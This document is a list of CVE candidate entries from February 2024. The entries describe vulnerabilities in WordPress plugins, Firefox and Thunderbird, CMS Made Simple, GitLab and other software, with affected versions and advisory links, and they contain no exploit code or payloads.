CVE 2024 1562 Candidate The WooCommerce Google Sheet Connector plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the execute_post_data function in all versions up to, and including, 1.3.11. This makes it possible for unauthenticated attackers to update plugin settings. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3038517%40wc-gsheetconnector&new=3038517%40wc-gsheetconnector&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/e36df7b7-fcbc-4e5d-812c-861bfe8abb55?source=cve Assigned (20240215)
CVE 2024 1559 Candidate The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'll_reciprocal' parameter in all versions up to, and including, 7.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037265%40link-library&new=3037265%40link-library&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/407a5c69-cce0-4868-aef0-ffc88981e256?source=cve Assigned (20240215)
CVE 2024 1557 Candidate Memory safety bugs present in Firefox 122. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 123. MISC:Memory safety bugs fixed in Firefox 123 | URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1746471%2C1848829%2C1864011%2C1869175%2C1869455%2C1869938%2C1871606 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ Assigned (20240215)
CVE 2024 1556 Candidate The incorrect object was checked for NULL in the built-in profiler, potentially leading to invalid memory access and undefined behavior. *Note:* This issue only affects the application when the profiler is running. This vulnerability affects Firefox < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1870414 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1870414 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ Assigned (20240215)
CVE 2024 1555 Candidate When opening a website using the `firefox://` protocol handler, SameSite cookies were not properly respected. This vulnerability affects Firefox < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1873223 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1873223 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ Assigned (20240215)
CVE 2024 1554 Candidate The `fetch()` API and navigation incorrectly shared the same cache, as the cache key did not include the optional headers `fetch()` may contain. Under the correct circumstances, an attacker may have been able to poison the local browser cache by priming it with a `fetch()` response controlled by the additional headers. Upon navigation to the same URL, the user would see the cached response instead of the expected response. This vulnerability affects Firefox < 123. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1816390 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1816390 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ Assigned (20240215)
CVE 2024 1553 Candidate Memory safety bugs present in Firefox 122, Firefox ESR 115.7, and Thunderbird 115.7. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 | URL:https://bugzilla.mozilla.org/buglist.cgi?bug_id=1855686%2C1867982%2C1871498%2C1872296%2C1873521%2C1873577%2C1873597%2C1873866%2C1874080%2C1874740%2C1875795%2C1875906%2C1876425%2C1878211%2C1878286 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1552 Candidate Incorrect code generation could have led to unexpected numeric conversions and potential undefined behavior.*Note:* This issue only affects 32-bit ARM devices. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1874502 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1874502 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1551 Candidate Set-Cookie response headers were being incorrectly honored in multipart HTTP responses. If an attacker could control the Content-Type response header, as well as control part of the response body, they could inject Set-Cookie response headers that would have been honored by the browser. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1864385 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1864385 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1550 Candidate A malicious website could have used a combination of exiting fullscreen mode and `requestPointerLock` to cause the user's mouse to be re-positioned unexpectedly, which could have led to user confusion and inadvertently granting permissions they did not intend to grant. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1860065 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1860065 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1549 Candidate If a website set a large custom cursor, portions of the cursor could have overlapped with the permission dialog, potentially resulting in user confusion and unexpected granted permissions. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1833814 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1833814 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1548 Candidate A website could have obscured the fullscreen notification by using a dropdown select input element. This could have led to user confusion and possible spoofing attacks. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1832627 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1832627 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1547 Candidate Through a series of API calls and redirects, an attacker-controlled alert dialog could have been displayed on another website (with the victim website's URL shown). This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1877879 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1877879 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1546 Candidate When storing and re-accessing data on a networking channel, the length of buffers may have been confused, resulting in an out-of-bounds memory read. This vulnerability affects Firefox < 123, Firefox ESR < 115.8, and Thunderbird < 115.8. MISC:https://bugzilla.mozilla.org/show_bug.cgi?id=1843752 | URL:https://bugzilla.mozilla.org/show_bug.cgi?id=1843752 | MISC:https://www.mozilla.org/security/advisories/mfsa2024-05/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-05/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-06/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-06/ | MISC:https://www.mozilla.org/security/advisories/mfsa2024-07/ | URL:https://www.mozilla.org/security/advisories/mfsa2024-07/ | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3747-1] firefox-esr security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00000.html | MLIST:[debian-lts-announce] 20240304 [SECURITY] [DLA 3748-1] thunderbird security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00001.html Assigned (20240215)
CVE 2024 1541 Candidate The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the htmlTag attribute in all versions up to, and including, 3.2.23 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.2.21/includes/blocks/class-kadence-blocks-advanced-heading-block.php#L418 | URL:https://plugins.trac.wordpress.org/browser/kadence-blocks/tags/3.2.21/includes/blocks/class-kadence-blocks-advanced-heading-block.php#L418 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3041366%40kadence-blocks%2Ftrunk&old=3036979%40kadence-blocks%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0913632-85c5-4835-b606-4eca51df2496?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d0913632-85c5-4835-b606-4eca51df2496?source=cve Assigned (20240215)
CVE 2024 1538 Candidate The File Manager plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 7.2.4. This is due to missing or incorrect nonce validation on the wp_file_manager page that includes files through the 'lang' parameter. This makes it possible for unauthenticated attackers to include local JavaScript files that can be leveraged to achieve RCE via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This issue was partially patched in version 7.2.4, and fully patched in 7.2.5. MISC:https://plugins.trac.wordpress.org/changeset/3051451/wp-file-manager | URL:https://plugins.trac.wordpress.org/changeset/3051451/wp-file-manager | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/57cc15a6-2cf5-481f-bb81-ada48aa74009?source=cve Assigned (20240215)
CVE 2024 1537 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Data Table widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Data_Table.php | URL:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Data_Table.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/81a48c61-4191-4252-9230-9df8fc5e3443?source=cve Assigned (20240215)
CVE 2024 1536 Candidate The Essential Addons for Elementor – Best Elementor Templates, Widgets, Kits & WooCommerce Builders plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's event calendar widget in all versions up to, and including, 5.9.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Event_Calendar.php | URL:https://plugins.trac.wordpress.org/changeset/3037755/essential-addons-for-elementor-lite/tags/5.9.10/includes/Elements/Event_Calendar.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/12dc9e63-17bb-4755-be3c-ae8b26edd3cd?source=cve Assigned (20240215)
CVE 2024 1535 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 4.15.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L952 | URL:https://github.com/WordpressPluginDirectory/wp-user-avatar/blob/fde360946c86d67610d8f95a82752199ce25b39a/wp-user-avatar/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php#L952 | MISC:https://plugins.trac.wordpress.org/changeset/3047008/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php | URL:https://plugins.trac.wordpress.org/changeset/3047008/wp-user-avatar/trunk/src/ShortcodeParser/Builder/FieldsShortcodeCallback.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/38ec1a6b-f5ee-446a-9e6c-3485dafb85ac?source=cve Assigned (20240215)
CVE 2024 1534 Candidate The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to, and including, 7.1.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3046146%40woocommerce-jetpack%2Ftrunk&old=3034358%40woocommerce-jetpack%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/56dc5138-c864-4e36-8b7d-38ac49589c06?source=cve Assigned (20240215)
CVE 2024 1530 Candidate A vulnerability, which was classified as critical, has been found in ECshop 4.1.8. Affected by this issue is some unknown functionality of the file /admin/view_sendlist.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250562 is the identifier assigned to this vulnerability. MISC:https://github.com/curlyyyyyyyy/ecshop/blob/main/README.md | URL:https://github.com/curlyyyyyyyy/ecshop/blob/main/README.md | MISC:https://vuldb.com/?ctiid.250562 | URL:https://vuldb.com/?ctiid.250562 | MISC:https://vuldb.com/?id.250562 | URL:https://vuldb.com/?id.250562 Assigned (20240215)
CVE 2024 1529 Candidate Vulnerability in CMS Made Simple 2.2.14, which does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/adduser.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially take over their browser session. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple Assigned (20240215)
CVE 2024 1528 Candidate CMS Made Simple version 2.2.14, does not sufficiently encode user-controlled input, resulting in a Cross-Site Scripting (XSS) vulnerability through /admin/moduleinterface.php, in multiple parameters. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to an authenticated user and partially hijack their browser session. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple Assigned (20240215)
CVE 2024 1527 Candidate Unrestricted file upload vulnerability in CMS Made Simple, affecting version 2.2.14. This vulnerability allows an authenticated user to bypass the security measures of the upload functionality and potentially create a remote execution of commands via webshell. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cms-made-simple Assigned (20240215)
CVE 2024 1525 Candidate An issue has been discovered in GitLab CE/EE affecting all versions starting from 16.1 before 16.7.6, all versions starting from 16.8 before 16.8.3, all versions starting from 16.9 before 16.9.1. Under some specialized conditions, an LDAP user may be able to reset their password using their verified secondary email address and sign-in using direct authentication with the reset password, bypassing LDAP. MISC:GitLab Issue #438144 | URL:https://gitlab.com/gitlab-org/gitlab/-/issues/438144 Assigned (20240215)
CVE 2024 1523 Candidate EC-WEB FS-EZViewer(Web)'s query functionality lacks proper restrictions of user input, allowing remote attackers authenticated as regular user to inject SQL commands for reading, modifying, and deleting database records, as well as executing system commands. Attackers may even leverage the dbo privilege in the database for privilege escalation, elevating their privileges to administrator. MISC:https://www.twcert.org.tw/tw/cp-132-7672-7eeac-1.html | URL:https://www.twcert.org.tw/tw/cp-132-7672-7eeac-1.html Assigned (20240215)
CVE 2024 1519 Candidate The Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'name' parameter in all versions up to, and including, 4.14.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This requires a member listing page to be active and using the Gerbera theme. MISC:https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Themes/DragDrop/MemberDirectory/Gerbera.php#L93 | URL:https://plugins.trac.wordpress.org/browser/wp-user-avatar/trunk/src/Themes/DragDrop/MemberDirectory/Gerbera.php#L93 | MISC:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | URL:https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037126%40wp-user-avatar%2Ftrunk&old=3030229%40wp-user-avatar%2Ftrunk&sfp_email=&sfph_mail= | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/4ffd74de-6629-4088-ba5c-ac9dd5c6322c?source=cve Assigned (20240214)
CVE 2024 1516 Candidate The WP eCommerce plugin for WordPress is vulnerable to unauthorized arbitrary post creation due to a missing capability check on the check_for_saas_push() function in all versions up to, and including, 3.15.1. This makes it possible for unauthenticated attackers to create arbitrary posts with arbitrary content. MISC:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L191 | URL:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L191 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/b0a9f3d2-aa7f-4fc2-9cfd-b69ec3f63160?source=cve Assigned (20240214)
CVE 2024 1515 Candidate ** REJECT ** Erroneous assignement Assigned (20240214)
CVE 2024 1514 Candidate The WP eCommerce plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'cart_contents' parameter in all versions up to, and including, 3.15.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L334 | URL:https://plugins.trac.wordpress.org/browser/wp-e-commerce/trunk/wpsc-components/marketplace-core-v1/library/Sputnik.php#L334 | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/0ba5da2b-6944-4243-a4f2-0f887abf7a66?source=cve Assigned (20240214)
CVE 2024 1512 Candidate The MasterStudy LMS WordPress Plugin – for Online Courses and Education plugin for WordPress is vulnerable to union based SQL Injection via the 'user' parameter of the /lms/stm-lms/order/items REST route in all versions up to, and including, 3.2.5 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. MISC:https://plugins.trac.wordpress.org/changeset/3036794/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/models/StmStatistics.php | URL:https://plugins.trac.wordpress.org/changeset/3036794/masterstudy-lms-learning-management-system/trunk/_core/lms/classes/models/StmStatistics.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d6b6d824-51d3-4da9-a39a-b957368df4dc?source=cve Assigned (20240214)
CVE 2024 1510 Candidate The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's su_tooltip shortcode in all versions up to, and including, 7.0.2 due to insufficient input sanitization and output escaping on user supplied attributes and user supplied tags. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.0.2/includes/shortcodes/tooltip.php | URL:https://plugins.trac.wordpress.org/browser/shortcodes-ultimate/tags/7.0.2/includes/shortcodes/tooltip.php | MISC:https://plugins.trac.wordpress.org/changeset/3037436/shortcodes-ultimate/trunk/includes/shortcodes/tooltip.php | URL:https://plugins.trac.wordpress.org/changeset/3037436/shortcodes-ultimate/trunk/includes/shortcodes/tooltip.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/ee03d780-076b-4501-a353-376198a4bd7b?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/ee03d780-076b-4501-a353-376198a4bd7b?source=cve Assigned (20240214)
CVE 2024 1508 Candidate The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'settings['title_tags']' attribute of the Mercury widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite | URL:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/7da00af0-edd1-4c39-ae33-a0dc21bd25a2?source=cve Assigned (20240214)
CVE 2024 1507 Candidate The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Rubix widget in all versions up to, and including, 3.13.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite | URL:https://plugins.trac.wordpress.org/changeset/3047591/bdthemes-prime-slider-lite | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/09f2cb22-07e2-4fe5-8c2a-9d4420ee26ed?source=cve Assigned (20240214)
CVE 2024 1506 Candidate The Prime Slider – Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title_tags' attribute of the Fiestar widget in all versions up to, and including, 3.13.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. MISC:https://plugins.trac.wordpress.org/changeset/3044299/bdthemes-prime-slider-lite | URL:https://plugins.trac.wordpress.org/changeset/3044299/bdthemes-prime-slider-lite | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/bbb3ee94-e631-47ee-9f16-6bf7c23abab1?source=cve Assigned (20240214)
